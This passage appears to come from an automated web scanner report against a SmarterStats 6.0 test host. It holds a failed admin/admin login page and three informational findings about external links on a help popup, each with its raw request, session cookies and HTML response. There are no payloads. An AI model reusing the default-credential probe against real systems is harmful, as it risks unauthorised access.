<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMjU1NDEwNjEyDxYEHhBfX19SZXN1bHRGYWlsdXJlBStTaXRlIElELCB1c2VybmFtZSBvciBwYXNzd29yZCBpcyBpbmNvcnJlY3QuHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFgICBQ9kFgJmD2QWBgIDD2QWAgIBDxYCHgRUZXh0BU08ZGl2IGNsYXNzPSJUaXBUZXh0RmFpbHVyZSI+U2l0ZSBJRCwgdXNlcm5hbWUgb3IgcGFzc3dvcmQgaXMgaW5jb3JyZWN0LjwvZGl2PmQCBQ9kFgICDQ8QDxYCHwIFC1JlbWVtYmVyIG1lZGRkZAIHD2QWBgIBDxBkEBUCFFVzZSBCcm93c2VyIExhbmd1YWdlB0VuZ2xpc2gVAgACZW4UKwMCZ2cWAWZkAgMPDxYCHgtOYXZpZ2F0ZVVSTAVjaHR0cDovL2hlbHAuc21hcnRlcnRvb2xzLmNvbS9TbWFydGVyU3RhdHMvdjYvZGVmYXVsdC5hc3B4P3A9VSZ2PTYuMC4zOTMyJmxhbmc9ZW4tVVMmcGFnZT1Mb2dpbkFkbWluZGQCBw8PFgIeCEltYWdlVXJsBQYvcy5naWZkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUWY3RsMDAkTVBIJGNoa0F1dG9Mb2dpbgUXY3RsMDAkQlBIJGJ0bkVudGVyQ2xpY2t6/zu2kQq0AGA1NGEQuLPtp+INf25i9ldPE2hT29rBcw==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>

<script language="javascript">window.onload = function() { if (document.getElementById('ctl00$MPH$txtSiteId') != null) document.getElementById('ctl00$MPH$txtSiteId').focus(); } </script>
<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/WebResource.axd?d=tmbPiP2D38VVojyjJVsEkXwe8X4rw_c60mStWfistR8pyJPOf4ElR79y8d6v9XE45y9Xuon7XBs01GFx3aJPBQ4-yv7YCKPFvc37E1RidaE1&amp;t=634219308989960000" type="text/javascript"></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <div id="ctl00_UpdatePanel1">
   
               <div class="CenteredLogin">
                   <div class="ShadowBox">
                       <div class="LoginBox">
                           <div class="LoginTitle">
                               <div class="RoundedPageTitleLeft">
                                   <div class="RoundedPageTitleRight">
                                       <div class="LoginTitleText">
                                           Login to SmarterStats
                                       </div>
                                   </div>
                               </div>
                           </div>
                           <div class="LoginFrame">
                               <div class="RoundedBottom">
                                   <div class="RoundedLeft">
                                       <div class="RoundedRight">
                                           <div class="RoundedBottomLeft">
                                               <div class="RoundedBottomRight">
                                                   <div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
                                                       <div class="TipTextFailure">Site ID, username or password is incorrect.</div>
                                                   </div>
                                                   <div class="LoginSpacer">
                                                   </div>
                                                   <div class="LoginContent">
                                                       
<div class="LoginSetting">
<div class="LoginLabel">
Site ID
</div>
<input name="ctl00$MPH$txtSiteId" type="text" value="admin" id="ctl00_MPH_txtSiteId" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Username
</div>
<input name="ctl00$MPH$txtUserName" type="text" value="admin" id="ctl00_MPH_txtUserName" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="3" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label>
</span>
</div>

                                                   </div>
                                                   <div class="LoginButtons">
                                                       
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$BPH$LanguageList\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_BPH_LanguageList" tabindex="3">
       <option selected="selected" value="">Use Browser Language</option>
       <option value="en">English</option>

   </select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http&#x3a;&#x2f;&#x2f;help&#x2e;smartertools&#x2e;com&#x2f;SmarterStats&#x2f;v6&#x2f;default&#x2e;aspx&#x3f;p&#x3d;U&#x26;v&#x3d;6&#x2e;0&#x2e;3932&#x26;lang&#x3d;en&#x2d;US&#x26;page&#x3d;LoginAdmin" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fhelp\x2esmartertools\x2ecom\x2fSmarterStats\x2fv6\x2fdefault\x2easpx\x3fp\x3dU\x26v\x3d6\x2e0\x2e3932\x26lang\x3den\x2dUS\x26page\x3dLoginAdmin','helpwindow',''); return false;" tabindex='6'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='5' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:1px;width:1px;border-width:0px;" />

                                                   </div>
                                               </div>
                                           </div>
                                       </div>
                                   </div>
                               </div>
                           </div>
                       </div>
                   </div>
                   <div class="LoginLinks">
                       <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>SmarterStats Free 6.0</a> | <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>Web Log Analytics & SEO Software</a> | &copy; 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
                   </div>
               </div>
               

                   <script type="text/javascript">
                       $(document).ready(function() {
                           $('select').each(function() {
                               if ($(this).width() > 180) $(this).width(180);
                           });
                       }); </script>

               
           
</div>
       
   

<script type="text/javascript">
//<![CDATA[
WebForm_AutoFocus('ctl00_MPH_txtSiteId');//]]>
</script>
</form>
</body>
</html>


5.3. http://vulnerable.smarterstats.6.0.host:9999/UserControls/Popups/frmHelp.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /UserControls/Popups/frmHelp.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /UserControls/Popups/frmHelp.aspx?url=admin/frmviewreports&extraInfo=ReportItem_ADMIN_Traffic_Trend HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=goyfjk5bgnfdbekr0r35mk2c; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"208759633","TopBarSection":"AdminReports"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 08:15:44 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 5804



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head id="ctl00_head1"><title>
   SmarterStats Help
</title><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Popup/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="innerpopup" dir="ltr">
   <form name="aspnetForm" method="post" action="frmHelp.aspx?url=admin%2ffrmviewreports&amp;extraInfo=ReportItem_ADMIN_Traffic_Trend" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJLTU4MjI4MjE1DxYEHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYGAgUPFgIeB1Zpc2libGVoZAIHD2QWAmYPZBYCAgEPFgIfAmgWAgIBDxYCHgRUZXh0ZWQCCw9kFggCAw8WAh8DBa8BPGEgdGFyZ2V0PSJfYmxhbmsiIGhyZWY9Imh0dHA6Ly9oZWxwLnNtYXJ0ZXJ0b29scy5jb20vU21hcnRlclN0YXRzL3Y2L2RlZmF1bHQuYXNweD9wPVNBJnY9Ni4wLjM5MzImbGFuZz1lbi1VUyZwYWdlPVJlcG9ydEl0ZW0lNWZBRE1JTiU1ZlRyYWZmaWMlNWZUcmVuZCI+SGVscCBmb3IgdGhpcyBwYWdlPC9hPmQCBQ8WAh8DBX48YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL2hlbHAuc21hcnRlcnRvb2xzLmNvbS9TbWFydGVyU3RhdHMvdjYvZGVmYXVsdC5hc3B4P3A9U0Emdj02LjAuMzkzMiZsYW5nPWVuLVVTIj5IZWxwIFRvcGljczwvYT5kAgcPFgIfAwWRATxhIHRhcmdldD0iX2JsYW5rIiBocmVmPSJodHRwOi8vaGVscC5zbWFydGVydG9vbHMuY29tL1NtYXJ0ZXJTdGF0cy92Ni9kZWZhdWx0LmFzcHg/cD1TQSZ2PTYuMC4zOTMyJmxhbmc9ZW4tVVMmcGFnZT1zZWFyY2giPlNlYXJjaCBPbmxpbmUgSGVscDwvYT5kAgkPFgIfAwUiU21hcnRlclN0YXRzIEZyZWUgRWRpdGlvbiA2LjAuMzkzMmRkjY1KUEA4a0uatFXkyhv+3hoDW55Oq0OEcQ8t6fhajwk=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>

       <script language="javascript" type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           $(function() { setTimeout(function() { GetFocus(); }, 50); RegisterResizeEvent(); });
       </script>

       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div class="PopupHelp">
       <div class="PopupHeader">
           What do you need help with?
       </div>
       <br />
       <ul class="SettingsBulletedList">
           <li>
               <a target="_blank" href="http://help.smartertools.com/SmarterStats/v6/default.aspx?p=SA&v=6.0.3932&lang=en-US&page=ReportItem%5fADMIN%5fTraffic%5fTrend">Help for this page</a></li>
           <li>
               <a target="_blank" href="http://help.smartertools.com/SmarterStats/v6/default.aspx?p=SA&v=6.0.3932&lang=en-US">Help Topics</a></li>
           <li>
               <a target="_blank" href="http://help.smartertools.com/SmarterStats/v6/default.aspx?p=SA&v=6.0.3932&lang=en-US&page=search">Search Online Help</a></li>
       </ul>
       <br />
   </div>
   <div class="PopupAbout">
       SmarterStats Free Edition 6.0.3932<br />
       Copyright &copy; 2003-2010
       All Rights Reserved.<br />
       <a href="http://www.smartertools.com" id="ctl00_MPH_STLink" target="_blank">http://www.smartertools.com</a>
   </div>

       </div>
       <div id="ctl00_Button" class="PopupButtons">
           <div class="ButtonBarLeft">
               

           </div>
           <div class="ButtonBarRight">
               
   <div id="ctl00_BrPH_CancelButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClosePopup(); return false;"><span class="BBInner">Close</span></a></div>

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
   <span id="ctl00_Scripts_InjectScript"></span>

   

<script type="text/javascript">
//<![CDATA[
document.ResizeEvent();//]]>
</script>
</form>
</body>
</html>


5.4. http://vulnerable.smarterstats.6.0.host:9999/UserControls/Popups/frmHelp.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /UserControls/Popups/frmHelp.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /UserControls/Popups/frmHelp.aspx?url= HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:00:22 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 5653
Connection: Close



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head id="ctl00_head1"><title>
   SmarterStats Help
</title><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Popup/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="innerpopup" dir="ltr">
   <form name="aspnetForm" method="post" action="frmHelp.aspx?url=" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJLTU4MjI4MjE1DxYEHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYGAgUPFgIeB1Zpc2libGVoZAIHD2QWAmYPZBYCAgEPFgIfAmgWAgIBDxYCHgRUZXh0ZWQCCw9kFggCAw8WAh8DBYsBPGEgdGFyZ2V0PSJfYmxhbmsiIGhyZWY9Imh0dHA6Ly9oZWxwLnNtYXJ0ZXJ0b29scy5jb20vU21hcnRlclN0YXRzL3Y2L2RlZmF1bHQuYXNweD9wPURBJnY9Ni4wLjM5MzImbGFuZz1lbi1VUyZwYWdlPSI+SGVscCBmb3IgdGhpcyBwYWdlPC9hPmQCBQ8WAh8DBX48YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL2hlbHAuc21hcnRlcnRvb2xzLmNvbS9TbWFydGVyU3RhdHMvdjYvZGVmYXVsdC5hc3B4P3A9REEmdj02LjAuMzkzMiZsYW5nPWVuLVVTIj5IZWxwIFRvcGljczwvYT5kAgcPFgIfAwWRATxhIHRhcmdldD0iX2JsYW5rIiBocmVmPSJodHRwOi8vaGVscC5zbWFydGVydG9vbHMuY29tL1NtYXJ0ZXJTdGF0cy92Ni9kZWZhdWx0LmFzcHg/cD1EQSZ2PTYuMC4zOTMyJmxhbmc9ZW4tVVMmcGFnZT1zZWFyY2giPlNlYXJjaCBPbmxpbmUgSGVscDwvYT5kAgkPFgIfAwUiU21hcnRlclN0YXRzIEZyZWUgRWRpdGlvbiA2LjAuMzkzMmRk2qeKuvsFtJiATFkCpRly8Ik/vWEulvZhcpMpVdZV0l8=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>

       <script language="javascript" type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           $(function() { setTimeout(function() { GetFocus(); }, 50); RegisterResizeEvent(); });
       </script>

       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div class="PopupHelp">
       <div class="PopupHeader">
           What do you need help with?
       </div>
       <br />
       <ul class="SettingsBulletedList">
           <li>
               <a target="_blank" href="http://help.smartertools.com/SmarterStats/v6/default.aspx?p=DA&v=6.0.3932&lang=en-US&page=">Help for this page</a></li>
           <li>
               <a target="_blank" href="http://help.smartertools.com/SmarterStats/v6/default.aspx?p=DA&v=6.0.3932&lang=en-US">Help Topics</a></li>
           <li>
               <a target="_blank" href="http://help.smartertools.com/SmarterStats/v6/default.aspx?p=DA&v=6.0.3932&lang=en-US&page=search">Search Online Help</a></li>
       </ul>
       <br />
   </div>
   <div class="PopupAbout">
       SmarterStats Free Edition 6.0.3932<br />
       Copyright &copy; 2003-2010
       All Rights Reserved.<br />
       <a href="http://www.smartertools.com" id="ctl00_MPH_STLink" target="_blank">http://www.smartertools.com</a>
   </div>

       </div>
       <div id="ctl00_Button" class="PopupButtons">
           <div class="ButtonBarLeft">
               

           </div>
           <div class="ButtonBarRight">
               
   <div id="ctl00_BrPH_CancelButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClosePopup(); return false;"><span class="BBInner">Close</span></a></div>

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
   <span id="ctl00_Scripts_InjectScript"></span>

   

<script type="text/javascript">
//<![CDATA[
document.ResizeEvent();//]]>
</script>
</form>
</body>
</html>


5.5. http://vulnerable.smarterstats.6.0.host:9999/UserControls/Popups/frmHelp.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /UserControls/Popups/frmHelp.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /UserControls/Popups/frmHelp.aspx?url= HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:23:45 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 5646
Connection: Close



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head id="ctl00_head1"><title>
   SmarterStats Help
</title><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Popup/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="innerpopup" dir="ltr">
   <form name="aspnetForm" method="post" action="frmHelp.aspx?url=" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJLTU4MjI4MjE1DxYEHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYGAgUPFgIeB1Zpc2libGVoZAIHD2QWAmYPZBYCAgEPFgIfAmgWAgIBDxYCHgRUZXh0ZWQCCw9kFggCAw8WAh8DBYoBPGEgdGFyZ2V0PSJfYmxhbmsiIGhyZWY9Imh0dHA6Ly9oZWxwLnNtYXJ0ZXJ0b29scy5jb20vU21hcnRlclN0YXRzL3Y2L2RlZmF1bHQuYXNweD9wPVUmdj02LjAuMzkzMiZsYW5nPWVuLVVTJnBhZ2U9Ij5IZWxwIGZvciB0aGlzIHBhZ2U8L2E+ZAIFDxYCHwMFfTxhIHRhcmdldD0iX2JsYW5rIiBocmVmPSJodHRwOi8vaGVscC5zbWFydGVydG9vbHMuY29tL1NtYXJ0ZXJTdGF0cy92Ni9kZWZhdWx0LmFzcHg/cD1VJnY9Ni4wLjM5MzImbGFuZz1lbi1VUyI+SGVscCBUb3BpY3M8L2E+ZAIHDxYCHwMFkAE8YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL2hlbHAuc21hcnRlcnRvb2xzLmNvbS9TbWFydGVyU3RhdHMvdjYvZGVmYXVsdC5hc3B4P3A9VSZ2PTYuMC4zOTMyJmxhbmc9ZW4tVVMmcGFnZT1zZWFyY2giPlNlYXJjaCBPbmxpbmUgSGVscDwvYT5kAgkPFgIfAwUiU21hcnRlclN0YXRzIEZyZWUgRWRpdGlvbiA2LjAuMzkzMmRkX4SYu9NT79Lu+ukNGIVKhBq7SuRPZT/3nVZyzUpC3B8=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
